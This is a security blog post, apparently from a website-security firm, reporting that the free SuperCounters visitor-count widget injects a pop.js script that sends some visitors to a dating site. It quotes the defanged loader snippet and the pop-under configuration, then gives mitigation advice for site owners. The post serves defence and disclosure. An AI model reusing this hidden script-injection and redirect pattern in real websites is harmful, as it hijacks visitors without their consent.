If we navigate way back into the recesses of our memory to the era of GeoCities websites and MySpace pages, we might distinctly recollect the popularity of the visitor-counting widget.
Commonly displayed on homepages across the web, these widgets served as credibility indicators to help site visitors identify the popularity of a website.
While this feature may have gone out of vogue with current website design trends and advanced analytics tools, they also fell out of favor for bad behavior – from stealing traffic and redirections to planting trojans and malware.
Queue SuperCounters, a free widget site offering a number of tools for site owners to showcase real-time web statistics on their web pages.
Unexpected Widget Behavior
We are regularly commissioned to investigate the source of unwanted redirects and pop-ups on websites. During a recent investigation, we worked on a website that exhibited unexpected behavior. Some visitors who navigated to their pages were being unexpectedly redirected to a dating site.
When inspecting the site traffic, we noticed that the redirect originated from the widget[.]supercounters[.]com/hit.js script used to display the SuperCounter hit widget tool on web pages.
This hit.js counter script loads another script from “hxxp://www[.]supercounters[.]com/fc.php?id=…”
Under normal circumstances, the fc.php file loads functional code (ie. sc_show_hit(515324,33970846, 1, 8);) which is used to display the visitor count in the widget.
SuperCounter – Now with Extra Redirect Features!
While the SuperCounters site doesn’t mention serving advertisements or redirects with its free service, if site visitors meet specific referrer and screen properties, then code similar to the snippet found below is loaded by the fc.php file:
sc_show_hit(920631,93988, 0, 6);var g = document.createElement('script'); g.type = 'text/javascript'; g.async = 'async'; g.src = '//widget.supercounters[.]com/js/pop[.]js'; (document.getElementsByTagName('head')[0] || d.getElementsByTagName('body')[0]).appendChild(g);Checking the hxxp://widget.supercounters[.]com/js/pop.js script reveals the following variables, which configure a pop-under and redirect the user to the dating site hxxp://mylove[.]is.
//url settings var gotoURLa = 'hxxp://mylove[.]is'; //madatory, given priority var gotoURLb = 'hxxp://mylove[.]is'; //optional, 2nd priority var videoEnb = true; //if video controlling is to be enabled // ad behaviour var resetCycle = 48; //value in Hours [Default:6] var pFXGaps = 1; //value in Seconds [Default:3] var pFXBubbles = 1; //number of Ads per user [Default:1] //total pops (urlA + urlB) var pFXType = 3; //1.TabUp 2.TabUnder 3.PopUnder 4.PopUp [Default:2] // popup window settings var pxTop = 0; // [Default: 0] var pxLeft = 0; // [Default: 0] var pFXWidth = 1370; // [Default:1370] var pFXHeight = 800; // [Default: 800];
At the current time of writing, 4094 web pages are using this script – the majority of which are from India.
Mitigation
Whenever you install a third-party service on your site (even a super-cool visitor-counting widget), there’s always a risk that you may end up with unexpected functionality – especially if that service is free.
We’d like to encourage website owners to think twice whenever loading third-party scripts, widgets, or elements on their websites. Do some research beforehand and make a backup of your site for quick and easy recovery.
If you’re using the SuperCounters widget, we highly recommend removing it as soon as possible. Replace it with a more reputable tool.
Website owners who are having a difficult time removing unwanted redirects or advertisements from their website can get in touch with us – we’re always happy to help.
Josh Hammer
Marc-Alexandre Montpas
Kayleigh Martin
Dre Armeda
Ben Martin
Denis Sinegubko